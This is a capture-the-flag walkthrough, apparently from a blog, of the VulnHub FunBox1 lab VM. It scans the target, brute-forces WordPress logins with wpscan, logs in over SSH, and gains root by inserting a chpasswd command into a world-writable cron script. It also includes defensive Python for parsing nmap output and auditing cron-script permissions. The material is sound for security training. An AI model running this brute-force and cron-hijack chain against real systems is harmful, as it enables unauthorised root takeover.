Target Machine Pentest Practice 22: FunBox1

Target description

Target URL: https://www.vulnhub.com/entry/funbox-1,518/

Description

Boot2Root ! This is a reallife scenario, but easy going. You have to enumerate and understand the scenario to get the root-flag in round about 20min.

This VM is created/tested with Virtualbox. Maybe it works with vmware.

If you need hints, call me on twitter: @0815R2d2

Have fun...

This works better with VirtualBox rather than VMware

1. Setting up the target environment

Attacker machine: Kali

IP address: 192.168.9.7

Target machine

IP address: 192.168.9.40

Note: the target and Kali only need to be on the same LAN (same subnet, i.e. both VMs use the same network mode).

The target environment was set up as follows:

  1. Import the downloaded target VM into VirtualBox and set its network adapter to Host-Only mode
  2. Set the bridged adapter in VMware to VirtualBox's Host-only network

2. Hands-on

2.1 Network scanning

2.1.1 Start the target and Kali, then scan

Method 1: arp-scan -I eth0 -l (scan on a specified interface)

arp-scan -I eth0 -l

☁  FunBox  arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:47:56:4d       PCS Systemtechnik GmbH
192.168.9.12    0a:00:27:00:00:03       (Unknown: locally administered)
192.168.9.40    08:00:27:cf:29:18       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 3 responded

Method 2: masscan <subnet to scan> -p <ports to scan>

masscan 192.168.184.0/24 -p 80,22

Method 3: netdiscover -i <interface> -r <subnet>

netdiscover -i eth0 -r 192.168.184.0/24

Method 4: left for readers to add

2.1.2 Check which ports the target has open

Use nmap -A -sV -T4 -p- <target IP> to list the target's open ports

☁  FunBox  nmap -A -sV -T4 -p- 192.168.9.40
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-25 11:25 CST
Nmap scan report for bogon (192.168.9.40)
Host is up (0.00036s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
|   256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_  256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
| http-robots.txt: 1 disallowed entry 
|_/secret/
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=2/25%Time=62184C2D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:CF:29:18 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms bogon (192.168.9.40)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.36 seconds

21---ftp---ProFTPD

22---ssh---OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

80---http---Apache httpd 2.4.41 ((Ubuntu))

33060---mysqlx?
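Reading four open ports off a screen is easy; reading a full -p- scan across many hosts is not, so scan output is usually turned into structured data before triage. The parser below is an added example, not code from the write-up or from nmap: it takes nmap's normal output (an excerpt of the scan above is embedded as sample input), groups NSE script output under each port, and pulls out the three things this scan actually told us: which services nmap only guessed (the trailing `?` on mysqlx), which hostname the web server redirects to (the reason for the /etc/hosts entry later), and which paths robots.txt disallows. Function and key names are the example's own.

```python
import re
from urllib.parse import urlparse

# Excerpt of the nmap output from the scan above, embedded here as sample input.
NMAP_OUTPUT = """\
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
|_  256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
| http-robots.txt: 1 disallowed entry 
|_/secret/
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC: 
|     Invalid message"
|_    HY000
"""

# A port line: "22/tcp    open  ssh     OpenSSH 8.2p1 ..."
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# A script header inside the "|" block: "http-title: Did not follow ..."
SCRIPT_RE = re.compile(r"^([A-Za-z0-9_.-]+):\s?(.*)$")


def parse_nmap(text):
    """Parse nmap's normal output into a list of port records.

    Each record carries port, proto, state, service, whether nmap only
    guessed the service (trailing '?'), the version string, and the NSE
    script output grouped by script name.
    """
    services, current, script = [], None, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = {
                "port": int(port), "proto": proto, "state": state,
                "service": service.rstrip("?"),
                "guessed": service.endswith("?"),
                "version": version.strip(),
                "scripts": {},
            }
            services.append(current)
            script = None
            continue
        if current is None or not line.startswith("|"):
            continue
        body = line[1:]
        if body.startswith("_"):          # "|_" marks the last line of a script block
            body = body[1:]
        indented = body.startswith("  ")  # continuation lines are indented under their script
        body = body.strip()
        m = SCRIPT_RE.match(body)
        if m and not indented:
            script = m.group(1)
            current["scripts"][script] = [m.group(2)] if m.group(2) else []
        elif script:
            current["scripts"][script].append(body)
    return services


def triage(services):
    """Summarise what a reviewer should look at first."""
    summary = {"open_ports": [], "guessed_services": [],
               "redirect_hosts": [], "robots_disallowed": []}
    for s in services:
        if s["state"] != "open":
            continue
        summary["open_ports"].append(s["port"])
        if s["guessed"]:
            summary["guessed_services"].append((s["port"], s["service"]))
        for title in s["scripts"].get("http-title", []):
            m = re.search(r"redirect to (\S+)", title)
            if m:
                host = urlparse(m.group(1)).hostname
                if host and host not in summary["redirect_hosts"]:
                    summary["redirect_hosts"].append(host)
        for entry in s["scripts"].get("http-robots.txt", []):
            if entry.startswith("/"):
                summary["robots_disallowed"].append(entry)
    return summary


if __name__ == "__main__":
    for key, value in triage(parse_nmap(NMAP_OUTPUT)).items():
        print(f"{key}: {value}")
```

For a real engagement you would feed it the file written by `nmap -oN`; the `guessed` flag is worth keeping because a service nmap could not identify (here mysqlx on 33060) is exactly the one whose version you cannot yet check against known issues.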

2.2 Enumerating vulnerabilities

Port 21 analysis


Port 22 analysis

Generally only brute force is possible here, and there is no suitable wordlist for now

Port 80 analysis

Visit: http://192.168.9.40


It redirects automatically to http://funbox.fritz.box/

Add to /etc/hosts: 192.168.9.40 funbox.fritz.box

Visit: http://funbox.fritz.box/


A quick look shows the site runs WordPress

Scan directories: gobuster dir -u http://funbox.fritz.box/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt

☁  FunBox  gobuster dir -u http://funbox.fritz.box/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://funbox.fritz.box/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,zip,bak,txt,php
[+] Timeout:                 10s
===============================================================
2022/02/25 14:13:51 Starting gobuster in directory enumeration mode
===============================================================
/.hta.html            (Status: 403) [Size: 281]
/.hta.zip             (Status: 403) [Size: 281]
/.hta                 (Status: 403) [Size: 281]
/.hta.bak             (Status: 403) [Size: 281]
/.hta.txt             (Status: 403) [Size: 281]
/.hta.php             (Status: 403) [Size: 281]
/.htaccess            (Status: 403) [Size: 281]
/.htaccess.zip        (Status: 403) [Size: 281]
/.htaccess.bak        (Status: 403) [Size: 281]
/.htpasswd            (Status: 403) [Size: 281]
/.htaccess.txt        (Status: 403) [Size: 281]
/.htpasswd.php        (Status: 403) [Size: 281]
/.htpasswd.html       (Status: 403) [Size: 281]
/.htaccess.php        (Status: 403) [Size: 281]
/.htaccess.html       (Status: 403) [Size: 281]
/.htpasswd.zip        (Status: 403) [Size: 281]
/.htpasswd.bak        (Status: 403) [Size: 281]
/.htpasswd.txt        (Status: 403) [Size: 281]
/index.php            (Status: 301) [Size: 0] [--> http://funbox.fritz.box/]
/index.php            (Status: 301) [Size: 0] [--> http://funbox.fritz.box/]
/license.txt          (Status: 200) [Size: 19915]                           
/readme.html          (Status: 200) [Size: 7278]                            
/robots.txt           (Status: 200) [Size: 19]                              
/robots.txt           (Status: 200) [Size: 19]                              
/secret               (Status: 301) [Size: 321] [--> http://funbox.fritz.box/secret/]
/server-status        (Status: 403) [Size: 281]                                      
/wp-admin             (Status: 301) [Size: 323] [--> http://funbox.fritz.box/wp-admin/]
/wp-content           (Status: 301) [Size: 325] [--> http://funbox.fritz.box/wp-content/]
/wp-includes          (Status: 301) [Size: 326] [--> http://funbox.fritz.box/wp-includes/]
/wp-settings.php      (Status: 500) [Size: 0]                                             
/wp-config.php        (Status: 200) [Size: 0]                                             
/wp-links-opml.php    (Status: 200) [Size: 221]                                           
/wp-mail.php          (Status: 403) [Size: 2709]                                          
/wp-blog-header.php   (Status: 200) [Size: 0]                                             
/wp-login.php         (Status: 200) [Size: 4502]                                          
/wp-cron.php          (Status: 200) [Size: 0]                                             
/wp-load.php          (Status: 200) [Size: 0]                                             
/wp-signup.php        (Status: 302) [Size: 0] [--> http://funbox.fritz.box/wp-login.php?action=register]
/wp-trackback.php     (Status: 200) [Size: 135]                                                         
/xmlrpc.php           (Status: 405) [Size: 42]                                                          
/xmlrpc.php           (Status: 405) [Size: 42]                                                                                             
===============================================================
2022/02/25 14:13:54 Finished
===============================================================

Visit: http://funbox.fritz.box/robots.txt


It reveals one directory

Visit: http://funbox.fritz.box/secret/


Nothing else of note was found

2.3 Exploitation

2.3.1 Scan the site with wpscan to obtain account credentials

Enumerate users with wpscan

wpscan --url http://funbox.fritz.box/ -e


Two users found: admin and joe

Brute-force the passwords with wpscan

wpscan --url http://funbox.fritz.box/ -U admin,joe --passwords /usr/share/wordlists/rockyou.txt


Passwords obtained: joe / 12345, admin / iubire

2.3.2 Get a shell with the credentials

Tried logging in to the website; nothing interesting found.
Tried SSH login: ssh joe@192.168.9.40


Login successful

joe@funbox:~$ id
uid=1001(joe) gid=1001(joe) groups=1001(joe)
joe@funbox:~$ sudo -l
[sudo] password for joe: 
Sorry, user joe may not run sudo on funbox.

2.4 Privilege escalation

2.4.1 Information gathering

Look at the home directories

joe@funbox:~$ ls -al /home
total 16
drwxr-xr-x  4 root  root  4096 Jun 19  2020 .
drwxr-xr-x 20 root  root  4096 Jun 19  2020 ..
drwxr-xr-x  3 funny funny 4096 Jul 18  2020 funny
drwxr-xr-x  5 joe   joe   4096 Jul 18  2020 joe
joe@funbox:~$ ls -al /home/funny
total 47608
drwxr-xr-x 3 funny funny     4096 Jul 18  2020 .
drwxr-xr-x 4 root  root      4096 Jun 19  2020 ..
-rwxrwxrwx 1 funny funny       55 Jul 18  2020 .backup.sh
-rw------- 1 funny funny     1462 Jul 18  2020 .bash_history
-rw-r--r-- 1 funny funny      220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 funny funny     3771 Feb 25  2020 .bashrc
drwx------ 2 funny funny     4096 Jun 19  2020 .cache
-rw-rw-r-- 1 funny funny 48701440 Feb 25 03:52 html.tar
-rw-r--r-- 1 funny funny      807 Feb 25  2020 .profile
-rw-rw-r-- 1 funny funny      162 Jun 19  2020 .reminder.sh
-rw-rw-r-- 1 funny funny       74 Jun 19  2020 .selected_editor
-rw-r--r-- 1 funny funny        0 Jun 19  2020 .sudo_as_admin_successful
-rw------- 1 funny funny     7791 Jul 18  2020 .viminfo
joe@funbox:~$ ls -al /home/joe
total 56
drwxr-xr-x 5 joe  joe  4096 Jul 18  2020 .
drwxr-xr-x 4 root root 4096 Jun 19  2020 ..
-rw------- 1 joe  joe  1141 Jul 18  2020 .bash_history
-rw-r--r-- 1 joe  joe   220 Jun 19  2020 .bash_logout
-rw-r--r-- 1 joe  joe  3771 Jun 19  2020 .bashrc
drwx------ 2 joe  joe  4096 Jun 19  2020 .cache
drwxrwxr-x 3 joe  joe  4096 Jul 18  2020 .local
-rw------- 1 joe  joe   998 Jul 18  2020 mbox
-rw------- 1 joe  joe   260 Jun 22  2020 .mysql_history
-rw-r--r-- 1 joe  joe   807 Jun 19  2020 .profile
drwx------ 2 joe  joe  4096 Jun 22  2020 .ssh
-rw------- 1 joe  joe  9549 Jul 18  2020 .viminfo

The funny user's home directory has a few sensitive files: .backup.sh, .reminder.sh, html.tar
Look at them:

joe@funbox:~$ cat /home/funny/.backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
joe@funbox:~$ cat /home/funny/.reminder.sh
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox

joe@funbox:~$ 

Two scripts, both run as root: one backs up the website, the other sends mail.
Upload pspy64 to monitor process execution:

joe@funbox:~$ cd /tmp
-rbash: cd: restricted
joe@funbox:~$ ls
mbox
joe@funbox:~$ bash
joe@funbox:~$ cd /tmp
joe@funbox:/tmp$ wget http://192.168.9.7/pspy64
--2022-02-25 03:56:39--  http://192.168.9.7/pspy64
Connecting to 192.168.9.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                      100%[=========================================================================================>]   2.94M  --.-KB/s    in 0.03s   

2022-02-25 03:56:39 (116 MB/s) - ‘pspy64’ saved [3078592/3078592]

joe@funbox:/tmp$ 

Start monitoring


We can see that .backup.sh runs every two minutes, so it is enough to modify the script to run the privilege-escalation command
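The root cause here is not the cron job itself but the -rwxrwxrwx mode on a script that root executes: anyone on the box can rewrite what root runs next. The audit below is an added example, not code from the write-up: it checks a script the way a hardening review would, against the uid/gid it is scheduled to run as, and reports owner mismatch, group- or world-writable mode, a symlink, or a world-writable parent directory without the sticky bit. The demo fixture is constructed in a temp directory with the same two-line script body and the 0777 mode seen in /home/funny, audited as if it ran as the current user; the function and file names are the example's own.

```python
import os
import stat
import tempfile


def audit_script(path, runner_uid=0, runner_gid=0):
    """Return findings for a script that a scheduler runs as runner_uid/runner_gid.

    An empty list means nobody other than that principal (or root) can change
    the file or swap its directory entry.
    """
    findings = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("symlink: whoever controls the link chooses what runs")
        st = os.stat(path)  # continue the checks on the target
    mode = st.st_mode
    if st.st_uid != runner_uid:
        findings.append(f"owned by uid {st.st_uid}, not the runner (uid {runner_uid}): "
                        "the owner can rewrite it")
    if mode & stat.S_IWGRP and st.st_gid != runner_gid:
        findings.append(f"group-writable by gid {st.st_gid}")
    if mode & stat.S_IWOTH:
        findings.append("world-writable: any local user can rewrite it")
    parent = os.path.dirname(os.path.abspath(path))
    pmode = os.stat(parent).st_mode
    if pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
        findings.append(f"directory {parent} is world-writable without the sticky bit: "
                        "the file can be replaced")
    return findings


def build_demo_fixture():
    """Construct two throwaway scripts and audit them as if run by the current user.

    .backup.sh mirrors the -rwxrwxrwx mode seen on the box; backup-fixed.sh is the
    same script at mode 0700. Paths and contents are constructed for the demo.
    """
    tmp = tempfile.mkdtemp(prefix="cron-audit-")  # mkdtemp creates the dir at 0700
    body = "#!/bin/bash\ntar -cf /home/funny/html.tar /var/www/html\n"
    results = {}
    for name, mode in ((".backup.sh", 0o777), ("backup-fixed.sh", 0o700)):
        path = os.path.join(tmp, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
        results[name] = audit_script(path, os.getuid(), os.getgid())
    return results


if __name__ == "__main__":
    for name, findings in build_demo_fixture().items():
        print(name, "->", findings or "OK")
```

On a real host you would call `audit_script` on every path referenced from /etc/crontab, /etc/cron.d/*, /etc/cron.{hourly,daily,weekly,monthly} and each user's crontab, passing the uid/gid of the user the job runs as; the fix for this box is the boring one of `chown root:root` plus `chmod 700` on any script root runs, or moving it out of a user's home directory altogether.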

2.4.2 Privilege escalation

Append the following to the .backup.sh script

Full procedure

joe@funbox:/home/funny$ vim .backup.sh
joe@funbox:/home/funny$ cat .backup.sh
#!/bin/bash
echo 'root:test' | sudo chpasswd
tar -cf /home/funny/html.tar /var/www/html
joe@funbox:/home/funny$ 

Wait a moment

joe@funbox:/home/funny# su root
Password: 
bash: _parse_usage: line 16: syntax error near unexpected token `('
bash: _parse_usage: line 16: ` -?(\[)+([a-zA-Z0-9?]))'
bash: error importing function definition for `_parse_usage'
bash: _longopt: line 6: syntax error near unexpected token `('
bash: _longopt: line 6: ` --!(no-*)dir*)'
bash: error importing function definition for `_longopt'
root@funbox:/home/funny# id
uid=0(root) gid=0(root) groups=0(root)
root@funbox:/home/funny# cd /root
root@funbox:~# ls -al
total 64
drwx------  6 root root 4096 Jul 18  2020 .
drwxr-xr-x 20 root root 4096 Jun 19  2020 ..
-rw-------  1 root root 2109 Jul 18  2020 .bash_history
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  2 root root 4096 Jun 19  2020 .cache
drwx------  3 root root 4096 Jun 19  2020 .config
-rw-r--r--  1 root root   49 Jul 18  2020 flag.txt
-rw-------  1 root root  779 Jun 19  2020 mbox
-rw-------  1 root root  200 Jun 19  2020 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   74 Jun 19  2020 .selected_editor
drwxr-xr-x  3 root root 4096 Jun 19  2020 snap
drwx------  2 root root 4096 Jun 19  2020 .ssh
-rw-------  1 root root 8924 Jul 18  2020 .viminfo
root@funbox:~# cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2
root@funbox:~# 

Privilege escalation succeeded and the flag obtained

Summary

In this session we used information gathering and directory scanning to find a sensitive directory, scanned the site with wpscan to obtain account credentials, logged in over SSH with those credentials, and escalated privileges through a scheduled-task script.

  1. Host discovery
  2. Port scanning
  3. Directory scanning
  4. wpscan scan
  5. Scheduled-task privilege escalation
posted @ 2022-04-02 16:11  hirak0